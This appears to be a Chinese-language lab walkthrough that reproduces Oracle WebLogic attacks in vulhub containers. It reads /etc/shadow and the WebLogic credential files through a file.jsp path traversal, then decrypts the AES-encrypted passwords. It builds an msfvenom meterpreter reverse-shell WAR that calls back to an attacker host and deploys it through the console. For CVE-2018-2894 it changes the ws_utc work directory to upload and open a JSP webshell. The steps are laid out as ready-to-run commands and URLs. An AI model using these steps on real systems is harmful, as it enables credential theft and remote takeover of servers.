Weblogic漏洞复现

cd /var/local/software

/var/local/soft/vulhub-master

解决报错

/var/local/soft/vulhub-master

✔ weblogic 17 layers [⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿] 0B/0B Pulled 294.9s

✔ 6599cadaf950 Pull complete 10.3s

✔ 23eda618d451 Pull complete 2.3s

✔ f0be3084efe9 Pull complete 1.9s

✔ 52de432f084b Pull complete 3.7s

✔ a3ed95caeb02 Pull complete 4.0s

✔ a2318f26c625 Pull complete 11.7s

✔ 1aa642dd8cc1 Pull complete 7.5s

✔ b307208f8bf5 Pull complete 20.3s

✔ 1dfbbdcc497d Pull complete 12.8s

✔ a53e674a7606 Pull complete 35.8s

✔ 5f06bb51fa3c Pull complete 31.3s

✔ ff0ff72567f2 Pull complete 189.5s

✔ 684862046025 Pull complete 34.0s

✔ abbf8d475455 Pull complete 252.3s

✔ 848eb11ef744 Pull complete 37.6s

✔ 2f3438f2b83b Pull complete 42.1s

✔ 8e5871e15571 Pull complete 47.2s

[+] Building 0.0s (0/0) docker:default

[+] Running 1/1

✘ Network weak_password_default Error 0.2s

failed to create network weak_password_default: Error response from daemon: Failed to program FILTER chain: iptables failed: iptables --wait -I FORWARD -o br-dee114e10024 -j DOCKER: iptables v1.4.21: Couldn't load target `DOCKER':No such file or directory

Try `iptables -h' or 'iptables --help' for more information.

(exit status 2)

  1. pkill docker
  2. iptables -t nat -F
  3. ifconfig docker0 down
  4. brctl delbr docker0
  5. docker -d
  6. systmctl restart docker

systemctl restart docker

192.168.23.154:7001

http://192.168.23.154:7001/console

username weblogic

password Oracle@123

http://192.168.23.154:7001/hello/file.jsp?path=/etc/passwd

http://192.168.23.154:7001/hello/file.jsp?path=/etc/shadow

密文绝对路径:

/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径:security/SerializedSystemIni.dat

密钥绝对路径:

/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml ,相对路径:config/config.xml

http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

密文

0d0a 0d0a 04d9 d0e2 e802 2087 50b0 fa9b

9552 23f4 82ec fe8d 5697 e422 4f1d 9ca1

0081 53fc 1da3 895a 4250 6818 3186 b88a

af82 723d 28a8 220f 9f28 7338 d8c5 f9af

3651 c7e7

密钥

http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

base_domain

10.3.6.0

base_domain

AuthenticatedUser

WebLogicCertPathProvider

myrealm

SystemPasswordValidator

8

1

myrealm

{AES}VDHLmpIFsxhe5+CetHjC3Du768mgXgEeInws2SytpnqhqgWkdGFks2BYtSJzE3FrrjdLjKS9w24Krv0Ong11Bogvc8rPC6HC3eqZy8X5U8/jhzgwct+ZTRgagnYCb4zy

weblogic

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

AdminServer

base_domain

{AES}uikbk+R+r6Vqv3OiFGQ4XnxJAHEnqFuni3K+SlgZxAsWEyIvLEi+O2omKTsWD9GW

10.3.6.0

_appsdir_hello_war

AdminServer

war

autodeploy/hello.war

DDOnly

stage

AdminServer

λ java -jar D:\800016PenetrationTesting\023中间件漏洞\Weblogic漏洞资料\weblogic_decrypt.jar

Exception in thread "AWT-EventQueue-0" java.lang.NoClassDefFoundError: org/bouncycastle/jce/provider/BouncyCastleProvider

at DecryptorView.makeButtonActionPerformed(DecryptorView.java:244)

at DecryptorView.access$200(DecryptorView.java:17)

at DecryptorView$3.actionPerformed(DecryptorView.java:100)

at java.desktop/javax.swing.AbstractButton.fireActionPerformed(AbstractButton.java:1972)

at java.desktop/javax.swing.AbstractButton$Handler.actionPerformed(AbstractButton.java:2313)

at java.desktop/javax.swing.DefaultButtonModel.fireActionPerformed(DefaultButtonModel.java:405)

at java.desktop/javax.swing.DefaultButtonModel.setPressed(DefaultButtonModel.java:262)

at java.desktop/javax.swing.plaf.basic.BasicButtonListener.mouseReleased(BasicButtonListener.java:279)

at java.desktop/java.awt.Component.processMouseEvent(Component.java:6626)

at java.desktop/javax.swing.JComponent.processMouseEvent(JComponent.java:3389)

at java.desktop/java.awt.Component.processEvent(Component.java:6391)

at java.desktop/java.awt.Container.processEvent(Container.java:2266)

at java.desktop/java.awt.Component.dispatchEventImpl(Component.java:5001)

at java.desktop/java.awt.Container.dispatchEventImpl(Container.java:2324)

at java.desktop/java.awt.Component.dispatchEvent(Component.java:4833)

at java.desktop/java.awt.LightweightDispatcher.retargetMouseEvent(Container.java:4948)

at java.desktop/java.awt.LightweightDispatcher.processMouseEvent(Container.java:4575)

1.下载bcprov-jdkxx-xxx.jar

https://www.bouncycastle.org/latest_releases.html

2.将bcprov-jdkxx-xxx.jar放入$JAVA_HOME/jre/lib/ext下

3.打开$JAVA_HOME/jre/lib/security下的java.security文件,在末尾加上

  security.provider.x=org.bouncycastle.jce.provider.BouncyCastleProvider

http://192.168.23.154:7001/hello/file.jsp?path=/etc/passwd

crypto

http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

Key密钥绝对路径

http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

base_domain 10.3.6.0 base_domain AuthenticatedUser WebLogicCertPathProvider myrealm SystemPasswordValidator 8 1 myrealm {AES}VDHLmpIFsxhe5+CetHjC3Du768mgXgEeInws2SytpnqhqgWkdGFks2BYtSJzE3FrrjdLjKS9w24Krv0Ong11Bogvc8rPC6HC3eqZy8X5U8/jhzgwct+ZTRgagnYCb4zy weblogic {AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k= AdminServer base_domain {AES}uikbk+R+r6Vqv3OiFGQ4XnxJAHEnqFuni3K+SlgZxAsWEyIvLEi+O2omKTsWD9GW 10.3.6.0 _appsdir_hello_war AdminServer war autodeploy/hello.war DDOnly stage AdminServer

Getshell

1、kali生成木马

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.23.133 lport=4444 -f war -o java.war

2、点击左侧 部署->安装->上传war包->(全部下一步)-> 完成

3、kali监听

msfconsole

use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set LHOST 192.168.23.133

set LPORT 4444

Exploit

4、访问:

http://192.168.23.154:7001/java

CVE-2018-2894

cve-2018-2894-weblogic-1 | Password does not Match the criteria, re-generating...

cve-2018-2894-weblogic-1 | Password does not Match the criteria, re-generating...

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 | Oracle WebLogic Server Auto Generated Empty Domain:

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 | ----> 'weblogic' admin password: yFTNj5Pv

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 | Initializing WebLogic Scripting Tool (WLST) ...

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 | Welcome to WebLogic Server Administration Scripting Shell

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 | Type help() for help on available commands

cve-2018-2894-weblogic-1 |

cve-2018-2894-weblogic-1 | domain_name : [base_domain]

cve-2018-2894-weblogic-1 | admin_port : [7001]

cve-2018-2894-weblogic-1 | domain_path : [/u01/oracle/user_projects/domains/base_domain]

cve-2018-2894-weblogic-1 | production_mode : [dev]

cve-2018-2894-weblogic-1 | admin password : [yFTNj5Pv]

cve-2018-2894-weblogic-1 | admin name : [AdminServer]

cve-2018-2894-weblogic-1 | admin username : [weblogic]

Browser

http://192.168.23.155:7001/console

yFTNj5Pv

漏洞地址:

http://192.168.23.155:7001/ws_utc/config.do

1、修改工作目录(一行内容,粘贴的时候去掉换行)

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app- wls/4mcj4y/war/css

2、点击安全——添加,上传大马dama.jsp

3、F12,搜索keystore_table,找到时间戳

1704376800851

4、访问木马(密码password)

http://192.168.23.155:7001/ws_utc/css/config/keystore/1704376800851_dama.jsp

http://192.168.23.155:7001/ws_utc/css/config/keystore/1704377142422_dama20240104.jsp

1704377142422

Logo

有“AI”的1024 = 2048,欢迎大家加入2048 AI社区

更多推荐